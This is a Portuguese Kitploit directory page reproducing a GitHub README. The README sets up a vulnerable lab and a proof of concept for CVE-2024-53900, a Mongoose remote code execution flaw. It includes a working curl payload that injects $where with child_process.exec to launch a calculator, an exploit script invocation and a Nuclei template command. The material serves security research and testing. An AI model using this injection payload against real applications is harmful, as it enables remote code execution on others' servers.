Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-53900 — Ambiente reproduzível e PoC para CVE-2024-53900, um RCE crítico no Mongoose via populate().match $where. Inclui script de exploração automatizado e template Nuclei para testes de segurança. | Kitploit
Ferramentas/GitHubGitHub/www-spam/cve-2024-53900
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubwww-spam/cve-2024-53900

CVE-2024-53900

Ambiente reproduzível e PoC para CVE-2024-53900, um RCE crítico no Mongoose via populate().match $where. Inclui script de exploração automatizado e template Nuclei para testes de segurança.

Ver Repositório
3há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-53900 - Mongoose populate().match $where RCE

Este repositório fornece um ambiente vulnerável reproduzível e PoC para CVE-2024-53900, uma vulnerabilidade crítica de Execução Remota de Código (RCE) no Mongoose < 8.8.3.


📌 Detalhes da Vulnerabilidade

  • CVE: CVE-2024-53900
  • Afetado: Mongoose < 8.8.3
  • Severidade: Crítico (CVSS 9.1)
  • Vetor: populate().match combinado com $where
  • Impacto: Execução arbitrária de JavaScript (RCE) no contexto Node.js

Referências:

  • GitHub Advisory
  • Fix Commit

🛠️ Instruções de Configuração

1. Clone o repositório

git clone https://github.com/www-spam/CVE-2024-53900.git
cd CVE-2024-53900

2. Inicie o ambiente (Docker Compose)

docker-compose up -d

📌 PoC GUI (Calculadora)

Por padrão, a aplicação Node.js vulnerável é executada dentro do Docker.
No entanto, aplicações GUI (como xcalc ou gnome-calculator) não serão iniciadas dentro de um contêiner.

👉 Se você quiser demonstrar o RCE lançando uma janela de calculadora:

  1. Execute o MongoDB no Docker (como backend de banco de dados)

    docker run -d --name mongo -p 27017:27017 mongo:6
    
  2. Execute a aplicação Node.js vulnerável localmente

   cd ~/cve-2024/app
   npm install
   node server.js
  • MongoDB executa na porta 27017
  • Aplicação Node.js vulnerável executa na porta 5000

📂 Estrutura de Diretórios

/home/kali/cve-2024/
├── docker-compose.yml     # Configuração do ambiente
├── exploit.py             # Script de exploração automatizado
├── CVE-2024-53900.yaml    # Template Nuclei
├── README.md              # Documentação
├── app/                   # Aplicação Node.js vulnerável
│   ├── Dockerfile
│   ├── package.json
│   ├── server.js
│   ├── models.js
│   └── views/
└── data/                  # Volume MongoDB

🚀 Exploração

Teste manual

curl "http://localhost:5000/book/{OBJECT_ID}/detail?view[path]=author&view[match][$where]=global.process.mainModule.constructor._load('child_process').exec('xcalc')"

PoC automatizada

python3 exploit.py --url http://localhost:5000

Com Nuclei

nuclei \ -u http://localhost:5000/book/{{OBJECT_ID}/detail \ -t ~/.local/nuclei-templates/CVE-2024-53900.yaml \ -var pfield=author
image

🔒 Notas de Segurança

  • Apenas para pesquisa e teste (não produção).
  • Payload restrito a operações seguras (ex.: criação de arquivos).
  • Totalmente isolado usando Docker.

✅ Ambiente Testado

  • SO: Kali Linux
  • MongoDB: mongo:6
  • Node.js: 18
  • Mongoose: 8.5.0 (vulnerável)
  • Express: 4.18.2

📸 Demonstração

Image
Baixar ferramenta